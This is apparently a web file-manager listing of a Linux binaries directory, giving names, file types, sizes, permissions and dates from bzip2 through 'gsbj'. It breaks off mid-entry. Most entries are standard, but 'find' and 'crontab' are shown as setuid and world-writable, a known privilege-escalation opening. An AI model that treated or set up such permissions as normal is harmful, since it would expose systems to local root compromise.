application/x-pie-executable
38.38 KB
-rwxr-xr-x
2022-03-23 09:45:10
bzcmp
text/x-shellscript
2.17 KB
-rwxr-xr-x
2022-03-23 09:45:10
bzdiff
text/x-shellscript
2.17 KB
-rwxr-xr-x
2022-03-23 09:45:10
bzegrep
text/x-shellscript
3.69 KB
-rwxr-xr-x
2022-03-23 09:45:10
bzexe
text/x-shellscript
4.78 KB
-rwxr-xr-x
2021-11-27 12:25:05
bzfgrep
text/x-shellscript
3.69 KB
-rwxr-xr-x
2022-03-23 09:45:10
bzgrep
text/x-shellscript
3.69 KB
-rwxr-xr-x
2022-03-23 09:45:10
bzip2
application/x-pie-executable
38.38 KB
-rwxr-xr-x
2022-03-23 09:45:10
bzip2recover
application/x-pie-executable
14.3 KB
-rwxr-xr-x
2022-03-23 09:45:10
bzless
text/x-shellscript
1.27 KB
-rwxr-xr-x
2022-03-23 09:45:10
bzmore
text/x-shellscript
1.27 KB
-rwxr-xr-x
2022-03-23 09:45:10
c++
application/x-executable
910.82 KB
-rwxr-xr-x
2025-12-18 07:31:24
c++filt
application/x-pie-executable
22.27 KB
-rwxr-xr-x
2025-12-03 03:08:01
c89
text/x-shellscript
428 B
-rwxr-xr-x
2020-11-17 06:53:07
c89-gcc
text/x-shellscript
428 B
-rwxr-xr-x
2020-11-17 06:53:07
c99
text/x-shellscript
454 B
-rwxr-xr-x
2020-11-17 06:53:07
c99-gcc
text/x-shellscript
454 B
-rwxr-xr-x
2020-11-17 06:53:07
c_rehash
text/x-perl
6.8 KB
-rwxr-xr-x
2026-07-29 04:56:04
captoinfo
application/x-pie-executable
86.41 KB
-rwxr-xr-x
2026-06-30 09:25:30
cat
application/x-pie-executable
34.46 KB
-rwxr-xr-x
2026-01-23 10:51:17
catman
application/x-pie-executable
34.76 KB
-rwxr-xr-x
2022-03-17 07:03:00
cautious-launcher
text/x-shellscript
758 B
-rwxr-xr-x
2026-07-03 01:05:05
cc
application/x-executable
906.82 KB
-rwxr-xr-x
2025-12-18 07:31:24
cftp3
text/x-script.python
956 B
-rwxr-xr-x
2026-05-22 03:02:45
cgi-fcgi
application/x-pie-executable
18.15 KB
-rwxr-xr-x
2025-04-30 08:57:03
chage
application/x-pie-executable
70.49 KB
-rwxr-sr-x
2024-02-06 12:54:23
chardet
text/x-script.python
965 B
-rwxr-xr-x
2020-12-30 04:42:51
chardetect
text/x-script.python
965 B
-rwxr-xr-x
2020-12-30 04:42:51
chattr
application/x-pie-executable
14.31 KB
-rwxr-xr-x
2023-10-09 01:50:10
chcon
application/x-pie-executable
58.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
checkgid
application/x-pie-executable
14.3 KB
-rwxr-xr-x
2026-07-06 04:41:46
chfn
application/x-pie-executable
71.01 KB
-rwsr-xr-x
2024-02-06 12:54:23
chgrp
application/x-pie-executable
54.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
chmod
application/x-pie-executable
54.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
choom
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
chown
application/x-pie-executable
58.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
chrt
application/x-pie-executable
26.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
chsh
application/x-pie-executable
43.76 KB
-rwsr-xr-x
2024-02-06 12:54:23
chvt
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2022-12-16 02:14:33
ckbcomp
text/x-perl
146.31 KB
-rwxr-xr-x
2021-11-22 04:39:53
ckeygen3
text/x-script.python
962 B
-rwxr-xr-x
2026-05-22 03:02:45
cksum
application/x-pie-executable
34.41 KB
-rwxr-xr-x
2026-01-23 10:51:17
clear
application/x-pie-executable
14.31 KB
-rwxr-xr-x
2026-06-30 09:25:30
clear_console
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2024-03-14 11:31:47
cloud-id
text/x-script.python
966 B
-rwxr-xr-x
2026-03-30 06:56:49
cloud-init
text/x-script.python
970 B
-rwxr-xr-x
2026-03-30 06:56:49
cloud-init-per
text/x-shellscript
2.06 KB
-rwxr-xr-x
2026-02-27 10:51:35
cmp
application/x-pie-executable
42.39 KB
-rwxr-xr-x
2022-03-23 01:50:34
cmuwmtopbm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
codepage
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2022-12-16 02:14:33
col
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
col1
text/x-shellscript
963 B
-rwxr-xr-x
2020-02-17 02:11:50
col2
text/x-shellscript
963 B
-rwxr-xr-x
2020-02-17 02:11:50
col3
text/x-shellscript
963 B
-rwxr-xr-x
2020-02-17 02:11:50
col4
text/x-shellscript
963 B
-rwxr-xr-x
2020-02-17 02:11:50
col5
text/x-shellscript
963 B
-rwxr-xr-x
2020-02-17 02:11:50
col6
text/x-shellscript
963 B
-rwxr-xr-x
2020-02-17 02:11:50
col7
text/x-shellscript
963 B
-rwxr-xr-x
2020-02-17 02:11:50
col8
text/x-shellscript
963 B
-rwxr-xr-x
2020-02-17 02:11:50
col9
text/x-shellscript
963 B
-rwxr-xr-x
2020-02-17 02:11:50
colcrt
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
colrm
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
column
application/x-pie-executable
34.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
comm
application/x-pie-executable
34.52 KB
-rwxr-xr-x
2026-01-23 10:51:17
compare
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
compare-im6
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
compare-im6.q16
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
compose
text/x-perl
18.06 KB
-rwxr-xr-x
2026-07-03 01:05:05
composite
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
composite-im6
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
composite-im6.q16
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
conch3
text/x-script.python
958 B
-rwxr-xr-x
2026-05-22 03:02:45
conjure
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
conjure-im6
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
conjure-im6.q16
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
convert
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
convert-im6
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
convert-im6.q16
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
corelist
text/x-perl
15.01 KB
-rwxr-xr-x
2026-06-23 08:11:00
corepack
application/javascript
174 B
-rwxr-xr-x
2025-01-21 06:00:50
cp
application/x-pie-executable
138.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
cpan
text/x-perl
8.16 KB
-rwxr-xr-x
2026-06-23 08:11:00
cpan5.34-x86_64-linux-gnu
text/x-perl
8.18 KB
-rwxr-xr-x
2026-06-23 08:11:00
cpio
application/x-pie-executable
141.64 KB
-rwxr-xr-x
2024-04-28 12:30:36
cpp
application/x-executable
906.82 KB
-rwxr-xr-x
2025-12-18 07:31:24
cpp-11
application/x-executable
906.82 KB
-rwxr-xr-x
2025-12-18 07:31:24
crontab
application/x-pie-executable
38.64 KB
-rwsrwxrwx
2022-03-23 01:49:13
csplit
application/x-pie-executable
106.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
ctail
text/x-shellscript
960 B
-rwxr-xr-x
2020-02-17 02:11:50
ctstat
application/x-pie-executable
22.66 KB
-rwxr-xr-x
2026-04-15 07:15:26
curl
application/x-pie-executable
254.23 KB
-rwxr-xr-x
2026-06-29 05:21:28
cut
application/x-pie-executable
38.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
cvtsudoers
application/x-pie-executable
296.4 KB
-rwxr-xr-x
2026-03-02 01:08:06
dash
application/x-pie-executable
122.74 KB
-rwxr-xr-x
2022-03-23 01:49:23
date
application/x-pie-executable
102.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
dbilogstrip
text/x-perl
1.35 KB
-rwxr-xr-x
2026-06-22 07:05:13
dbiprof
text/x-perl
6.06 KB
-rwxr-xr-x
2026-06-22 07:05:13
dbiproxy
text/x-perl
5.27 KB
-rwxr-xr-x
2026-06-22 07:05:13
dbus-cleanup-sockets
application/x-pie-executable
14.29 KB
-rwxr-xr-x
2022-10-25 01:15:07
dbus-daemon
application/x-pie-executable
227.32 KB
-rwxr-xr-x
2022-10-25 01:15:07
dbus-monitor
application/x-pie-executable
26.29 KB
-rwxr-xr-x
2022-10-25 01:15:07
dbus-run-session
application/x-pie-executable
14.29 KB
-rwxr-xr-x
2022-10-25 01:15:07
dbus-send
application/x-pie-executable
26.29 KB
-rwxr-xr-x
2022-10-25 01:15:07
dbus-update-activation-environment
application/x-pie-executable
14.29 KB
-rwxr-xr-x
2022-10-25 01:15:07
dbus-uuidgen
application/x-pie-executable
14.29 KB
-rwxr-xr-x
2022-10-25 01:15:07
dbxtool
application/x-pie-executable
22.3 KB
-rwxr-xr-x
2026-06-12 07:13:00
dd
application/x-pie-executable
66.52 KB
-rwxr-xr-x
2026-01-23 10:51:17
deallocvt
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2022-12-16 02:14:33
deb-systemd-helper
text/x-perl
20.89 KB
-rwxr-xr-x
2021-12-07 09:55:54
deb-systemd-invoke
text/x-perl
6.01 KB
-rwxr-xr-x
2022-02-15 10:31:40
debconf
text/x-perl
2.79 KB
-rwxr-xr-x
2022-02-20 02:42:49
debconf-apt-progress
text/x-perl
11.27 KB
-rwxr-xr-x
2022-02-20 02:42:49
debconf-communicate
text/x-perl
608 B
-rwxr-xr-x
2022-02-20 02:42:49
debconf-copydb
text/x-perl
1.68 KB
-rwxr-xr-x
2022-02-20 02:42:49
debconf-escape
text/x-perl
647 B
-rwxr-xr-x
2022-02-20 02:42:49
debconf-set-selections
text/x-perl
2.92 KB
-rwxr-xr-x
2022-02-20 02:42:49
debconf-show
text/x-perl
1.78 KB
-rwxr-xr-x
2022-02-20 02:42:49
debian-distro-info
application/x-pie-executable
22.95 KB
-rwxr-xr-x
2023-11-28 12:18:32
delpart
application/x-pie-executable
14.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
delv
application/x-pie-executable
45.32 KB
-rwxr-xr-x
2026-05-21 02:42:08
df
application/x-pie-executable
83.08 KB
-rwxr-xr-x
2026-01-23 10:51:17
dh_bash-completion
text/x-perl
4.31 KB
-rwxr-xr-x
2021-11-11 03:41:52
dh_perl_dbi
text/x-perl
1.17 KB
-rwxr-xr-x
2026-06-22 07:05:13
dh_perl_openssl
text/x-perl
1.5 KB
-rwxr-xr-x
2020-05-16 09:46:26
diff
application/x-pie-executable
130.55 KB
-rwxr-xr-x
2022-03-23 01:50:34
diff3
application/x-pie-executable
54.52 KB
-rwxr-xr-x
2022-03-23 01:50:34
dig
application/x-pie-executable
150.83 KB
-rwxr-xr-x
2026-05-21 02:42:08
dir
application/x-pie-executable
134.98 KB
-rwxr-xr-x
2026-01-23 10:51:17
dircolors
application/x-pie-executable
38.52 KB
-rwxr-xr-x
2026-01-23 10:51:17
dirmngr
application/x-pie-executable
433.02 KB
-rwxr-xr-x
2026-01-05 10:14:39
dirmngr-client
application/x-pie-executable
54.92 KB
-rwxr-xr-x
2026-01-05 10:14:39
dirname
application/x-pie-executable
30.38 KB
-rwxr-xr-x
2026-01-23 10:51:17
display
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
display-im6
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
display-im6.q16
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2024-07-19 08:37:45
distro-info
application/x-pie-executable
22.89 KB
-rwxr-xr-x
2023-11-28 12:18:32
dmesg
application/x-pie-executable
70.61 KB
-rwxr-xr-x
2026-03-06 04:10:04
dnsdomainname
application/x-pie-executable
22.23 KB
-rwxr-xr-x
2022-03-23 01:57:59
do-release-upgrade
text/x-script.python
10.42 KB
-rwxr-xr-x
2026-02-27 02:57:20
domainname
application/x-pie-executable
22.23 KB
-rwxr-xr-x
2022-03-23 01:57:59
dpkg
application/x-pie-executable
310.69 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-architecture
text/x-perl
13.51 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-buildflags
text/x-perl
7.39 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-buildpackage
text/x-perl
31.67 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-checkbuilddeps
text/x-perl
7.45 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-deb
application/x-pie-executable
134.49 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-distaddfile
text/x-perl
2.72 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-divert
application/x-pie-executable
118.49 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-genbuildinfo
text/x-perl
16.71 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-genchanges
text/x-perl
17.27 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-gencontrol
text/x-perl
14.24 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-gensymbols
text/x-perl
10.65 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-maintscript-helper
text/x-shellscript
20.71 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-mergechangelogs
text/x-perl
8.69 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-name
text/x-perl
6.63 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-parsechangelog
text/x-perl
4.83 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-query
application/x-pie-executable
138.52 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-realpath
text/x-shellscript
4.09 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-scanpackages
text/x-perl
8.5 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-scansources
text/x-perl
8.96 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-shlibdeps
text/x-perl
30.96 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-source
text/x-perl
22.56 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-split
application/x-pie-executable
98.51 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-statoverride
application/x-pie-executable
46.26 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-trigger
application/x-pie-executable
42.41 KB
-rwxr-xr-x
2025-09-09 08:09:16
dpkg-vendor
text/x-perl
3.19 KB
-rwxr-xr-x
2025-09-09 08:09:16
du
application/x-pie-executable
146.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
dumpkeys
application/x-pie-executable
158.71 KB
-rwxr-xr-x
2022-12-16 02:14:33
dvipdf
text/x-shellscript
1007 B
-rwxr-xr-x
2025-09-25 04:42:27
dwp
application/x-pie-executable
1.82 MB
-rwxr-xr-x
2025-12-03 03:08:01
eatmydata
text/x-shellscript
2.74 KB
-rwxr-xr-x
2021-04-17 11:51:44
ec2metadata
text/x-script.python
8.38 KB
-rwxr-xr-x
2021-08-05 09:58:37
echo
application/x-pie-executable
34.3 KB
-rwxr-xr-x
2026-01-23 10:51:17
ed
application/x-pie-executable
54.49 KB
-rwxr-xr-x
2022-02-13 11:08:51
edit
text/x-perl
18.06 KB
-rwxr-xr-x
2026-07-03 01:05:05
editor
application/x-pie-executable
276.52 KB
-rwxr-xr-x
2026-06-03 10:51:38
egrep
text/x-shellscript
28 B
-rwxr-xr-x
2022-03-23 01:56:13
eject
application/x-pie-executable
42.23 KB
-rwxr-xr-x
2026-03-06 04:10:04
elfedit
application/x-pie-executable
34.72 KB
-rwxr-xr-x
2025-12-03 03:08:01
enc2xs
text/x-perl
40.84 KB
-rwxr-xr-x
2026-06-23 08:11:00
encguess
text/x-perl
3.01 KB
-rwxr-xr-x
2026-06-23 08:11:00
env
application/x-pie-executable
42.95 KB
-rwxr-xr-x
2026-01-23 10:51:17
envsubst
application/x-pie-executable
34.38 KB
-rwxr-xr-x
2022-03-25 10:31:07
eps2eps
text/x-shellscript
639 B
-rwxr-xr-x
2025-09-25 04:42:27
eqn
application/x-pie-executable
188.45 KB
-rwxr-xr-x
2022-03-23 01:56:30
ex
application/x-pie-executable
3.61 MB
-rwxr-xr-x
2026-07-13 07:08:21
expand
application/x-pie-executable
34.53 KB
-rwxr-xr-x
2026-01-23 10:51:17
expiry
application/x-pie-executable
22.59 KB
-rwxr-sr-x
2024-02-06 12:54:23
expr
application/x-pie-executable
102.41 KB
-rwxr-xr-x
2026-01-23 10:51:17
eyuvtoppm
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
factor
application/x-pie-executable
70.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
faillog
application/x-pie-executable
22.59 KB
-rwxr-xr-x
2024-02-06 12:54:23
faked-sysv
application/x-pie-executable
30.39 KB
-rwxr-xr-x
2022-03-05 08:33:00
faked-tcp
application/x-pie-executable
30.38 KB
-rwxr-xr-x
2022-03-05 08:33:00
fakeroot
text/x-shellscript
3.9 KB
-rwxr-xr-x
2022-03-05 08:33:00
fakeroot-sysv
text/x-shellscript
3.9 KB
-rwxr-xr-x
2022-03-05 08:33:00
fakeroot-tcp
text/x-shellscript
3.9 KB
-rwxr-xr-x
2022-03-05 08:33:00
fallocate
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
false
application/x-pie-executable
26.3 KB
-rwxr-xr-x
2026-01-23 10:51:17
fc-cache
application/x-pie-executable
22.23 KB
-rwxr-xr-x
2022-03-23 01:52:38
fc-cat
application/x-pie-executable
18.23 KB
-rwxr-xr-x
2022-03-23 01:52:38
fc-conflist
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2022-03-23 01:52:38
fc-list
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2022-03-23 01:52:38
fc-match
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2022-03-23 01:52:38
fc-pattern
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2022-03-23 01:52:38
fc-query
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2022-03-23 01:52:38
fc-scan
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2022-03-23 01:52:38
fc-validate
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2022-03-23 01:52:38
fcgistarter
application/x-pie-executable
14.3 KB
-rwxr-xr-x
2026-07-06 04:41:46
fgconsole
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2022-12-16 02:14:33
fgrep
text/x-shellscript
28 B
-rwxr-xr-x
2022-03-23 01:56:13
fiascotopnm
application/x-pie-executable
118.6 KB
-rwxr-xr-x
2021-02-07 06:32:35
file
application/x-pie-executable
26.56 KB
-rwxr-xr-x
2023-09-11 05:59:06
finalrd
text/x-shellscript
2.06 KB
-rwxr-xr-x
2022-02-16 04:56:26
fincore
application/x-pie-executable
22.42 KB
-rwxr-xr-x
2026-03-06 04:10:04
find
application/x-pie-executable
275.48 KB
-rwsrwxrwx
2022-03-23 01:52:12
findmnt
application/x-pie-executable
63.61 KB
-rwxr-xr-x
2026-03-06 04:10:04
fitstopnm
application/x-pie-executable
18.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
flock
application/x-pie-executable
22.48 KB
-rwxr-xr-x
2026-03-06 04:10:04
fmt
application/x-pie-executable
38.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
fold
application/x-pie-executable
34.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
free
application/x-pie-executable
26.23 KB
-rwxr-xr-x
2023-10-31 11:36:04
fstopgm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ftp
application/x-pie-executable
178.9 KB
-rwxr-xr-x
2022-03-25 10:01:15
ftpcount
application/x-pie-executable
23.66 KB
-rwxr-xr-x
2025-02-05 01:53:13
ftpdctl
application/x-pie-executable
98.36 KB
-rwxr-xr-x
2025-02-05 01:53:13
ftptop
application/x-pie-executable
27.33 KB
-rwxr-xr-x
2025-02-05 01:53:13
ftpwho
application/x-pie-executable
43.8 KB
-rwxr-xr-x
2025-02-05 01:53:13
funzip
application/x-pie-executable
22.3 KB
-rwxr-xr-x
2024-02-01 03:52:55
fuser
application/x-pie-executable
39.31 KB
-rwxr-xr-x
2022-03-24 04:29:37
fusermount
application/x-pie-executable
34.38 KB
-rwsr-xr-x
2022-03-23 01:53:14
fusermount3
application/x-pie-executable
34.38 KB
-rwsr-xr-x
2022-03-23 01:53:14
fwupdmgr
application/x-pie-executable
130.3 KB
-rwxr-xr-x
2026-06-12 07:13:00
fwupdtool
application/x-pie-executable
142.3 KB
-rwxr-xr-x
2026-06-12 07:13:00
g++
application/x-executable
910.82 KB
-rwxr-xr-x
2025-12-18 07:31:24
g++-11
application/x-executable
910.82 KB
-rwxr-xr-x
2025-12-18 07:31:24
g3topbm
application/x-pie-executable
17.13 KB
-rwxr-xr-x
2021-02-07 06:32:35
gapplication
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2026-01-28 05:57:54
gawk
application/x-pie-executable
688.46 KB
-rwxr-xr-x
2026-07-20 10:38:47
gcc
application/x-executable
906.82 KB
-rwxr-xr-x
2025-12-18 07:31:24
gcc-11
application/x-executable
906.82 KB
-rwxr-xr-x
2025-12-18 07:31:24
gcc-ar
application/x-executable
26.54 KB
-rwxr-xr-x
2025-12-18 07:31:24
gcc-ar-11
application/x-executable
26.54 KB
-rwxr-xr-x
2025-12-18 07:31:24
gcc-nm
application/x-executable
26.54 KB
-rwxr-xr-x
2025-12-18 07:31:24
gcc-nm-11
application/x-executable
26.54 KB
-rwxr-xr-x
2025-12-18 07:31:24
gcc-ranlib
application/x-executable
26.54 KB
-rwxr-xr-x
2025-12-18 07:31:24
gcc-ranlib-11
application/x-executable
26.54 KB
-rwxr-xr-x
2025-12-18 07:31:24
gcov
application/x-executable
400.01 KB
-rwxr-xr-x
2025-12-18 07:31:24
gcov-11
application/x-executable
400.01 KB
-rwxr-xr-x
2025-12-18 07:31:24
gcov-dump
application/x-executable
251.84 KB
-rwxr-xr-x
2025-12-18 07:31:24
gcov-dump-11
application/x-executable
251.84 KB
-rwxr-xr-x
2025-12-18 07:31:24
gcov-tool
application/x-executable
275.93 KB
-rwxr-xr-x
2025-12-18 07:31:24
gcov-tool-11
application/x-executable
275.93 KB
-rwxr-xr-x
2025-12-18 07:31:24
gdbus
application/x-pie-executable
50.38 KB
-rwxr-xr-x
2026-01-28 05:57:54
gdk-pixbuf-csource
application/x-pie-executable
14.33 KB
-rwxr-xr-x
2026-04-02 01:40:56
gdk-pixbuf-pixdata
application/x-pie-executable
14.31 KB
-rwxr-xr-x
2026-04-02 01:40:56
gdk-pixbuf-thumbnailer
application/x-pie-executable
18.39 KB
-rwxr-xr-x
2026-04-02 01:40:56
gemtopbm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
gemtopnm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
gencat
application/x-pie-executable
26.37 KB
-rwxr-xr-x
2026-07-24 12:11:17
geqn
application/x-pie-executable
188.45 KB
-rwxr-xr-x
2022-03-23 01:56:30
getconf
application/x-pie-executable
34.29 KB
-rwxr-xr-x
2026-07-24 12:11:17
getent
application/x-pie-executable
38.65 KB
-rwxr-xr-x
2026-07-24 12:11:17
getkeycodes
application/x-pie-executable
14.23 KB
-rwxr-xr-x
2022-12-16 02:14:33
getopt
application/x-pie-executable
22.38 KB
-rwxr-xr-x
2026-03-06 04:10:04
gettext
application/x-pie-executable
34.38 KB
-rwxr-xr-x
2022-03-25 10:31:07
gettext.sh
text/x-shellscript
5.07 KB
-rwxr-xr-x
2022-03-25 10:31:07
ghostscript
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2025-09-25 04:42:27
giftopnm
application/x-pie-executable
22.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
ginstall-info
application/x-pie-executable
103.23 KB
-rwxr-xr-x
2022-02-06 12:48:45
gio
application/x-pie-executable
90.4 KB
-rwxr-xr-x
2026-01-28 05:57:54
gio-querymodules
application/x-pie-executable
14.3 KB
-rwxr-xr-x
2026-01-28 05:57:54
git
application/x-pie-executable
3.54 MB
-rwxr-xr-x
2026-02-26 07:49:53
git-receive-pack
application/x-pie-executable
3.54 MB
-rwxr-xr-x
2026-02-26 07:49:53
git-shell
application/x-pie-executable
552.58 KB
-rwxr-xr-x
2026-02-26 07:49:53
git-upload-archive
application/x-pie-executable
3.54 MB
-rwxr-xr-x
2026-02-26 07:49:53
git-upload-pack
application/x-pie-executable
3.54 MB
-rwxr-xr-x
2026-02-26 07:49:53
glib-compile-schemas
application/x-pie-executable
50.3 KB
-rwxr-xr-x
2026-01-28 05:57:54
gmake
application/x-pie-executable
249.7 KB
-rwxr-xr-x
2022-02-15 03:32:21
gold
application/x-pie-executable
3.04 MB
-rwxr-xr-x
2025-12-03 03:08:01
gouldtoppm
application/x-pie-executable
14.02 KB
-rwxr-xr-x
2021-02-07 06:32:35
gpasswd
application/x-pie-executable
70.38 KB
-rwsr-xr-x
2024-02-06 12:54:23
gpg
application/x-pie-executable
1 MB
-rwxr-xr-x
2026-01-05 10:14:39
gpg-agent
application/x-pie-executable
312.96 KB
-rwxr-xr-x
2026-01-05 10:14:39
gpg-connect-agent
application/x-pie-executable
82.99 KB
-rwxr-xr-x
2026-01-05 10:14:39
gpg-wks-server
application/x-pie-executable
115.05 KB
-rwxr-xr-x
2026-01-05 10:14:39
gpg-zip
text/x-shellscript
3.43 KB
-rwxr-xr-x
2026-01-05 10:14:39
gpgcompose
application/x-pie-executable
496.48 KB
-rwxr-xr-x
2026-01-05 10:14:39
gpgconf
application/x-pie-executable
126.73 KB
-rwxr-xr-x
2026-01-05 10:14:39
gpgparsemail
application/x-pie-executable
34.38 KB
-rwxr-xr-x
2026-01-05 10:14:39
gpgsm
application/x-pie-executable
418.9 KB
-rwxr-xr-x
2026-01-05 10:14:39
gpgsplit
application/x-pie-executable
26.55 KB
-rwxr-xr-x
2026-01-05 10:14:39
gpgtar
application/x-pie-executable
63.39 KB
-rwxr-xr-x
2026-01-05 10:14:39
gpgv
application/x-pie-executable
271.04 KB
-rwxr-xr-x
2026-01-05 10:14:39
gpic
application/x-pie-executable
200.04 KB
-rwxr-xr-x
2022-03-23 01:56:30
gprof
application/x-pie-executable
111.79 KB
-rwxr-xr-x
2025-12-03 03:08:01
gpu-manager
application/x-pie-executable
78.82 KB
-rwxr-xr-x
2025-12-10 09:16:48
grep
application/x-pie-executable
178.45 KB
-rwxr-xr-x
2022-03-23 01:56:13
gresource
application/x-pie-executable
22.3 KB
-rwxr-xr-x
2026-01-28 05:57:54
groff
application/x-pie-executable
94.5 KB
-rwxr-xr-x
2022-03-23 01:56:30
grog
text/x-perl
2.71 KB
-rwxr-xr-x
2022-03-23 01:56:30
grops
application/x-pie-executable
162.55 KB
-rwxr-xr-x
2022-03-23 01:56:30
grotty
application/x-pie-executable
118.52 KB
-rwxr-xr-x
2022-03-23 01:56:30
groups
application/x-pie-executable
34.51 KB
-rwxr-xr-x
2026-01-23 10:51:17
growpart
text/x-shellscript
26.22 KB
-rwxr-xr-x
2021-08-05 09:58:37
grub-editenv
application/x-pie-executable
376.95 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-file
application/x-pie-executable
816.45 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-fstest
application/x-pie-executable
937.92 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-glue-efi
application/x-pie-executable
247.86 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-kbdcomp
text/x-shellscript
1.64 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-menulst2cfg
application/x-pie-executable
228.13 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-mkfont
application/x-pie-executable
272.42 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-mkimage
application/x-pie-executable
361.05 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-mklayout
application/x-pie-executable
252.17 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-mknetdir
application/x-pie-executable
417.66 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-mkpasswd-pbkdf2
application/x-pie-executable
256.2 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-mkrelpath
application/x-pie-executable
247.58 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-mkrescue
application/x-pie-executable
998.47 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-mkstandalone
application/x-pie-executable
493.95 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-mount
application/x-pie-executable
760.84 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-ntldr-img
application/x-pie-executable
38.24 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-render-label
application/x-pie-executable
828.83 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-script-check
application/x-pie-executable
275.7 KB
-rwxr-xr-x
2022-12-18 09:21:26
grub-syslinux2cfg
application/x-pie-executable
781.34 KB
-rwxr-xr-x
2022-12-18 09:21:26
gs
application/x-pie-executable
14.15 KB
-rwxr-xr-x
2025-09-25 04:42:27
gsbj
text/x-shellscript
350 B
-rwxr-xr-x
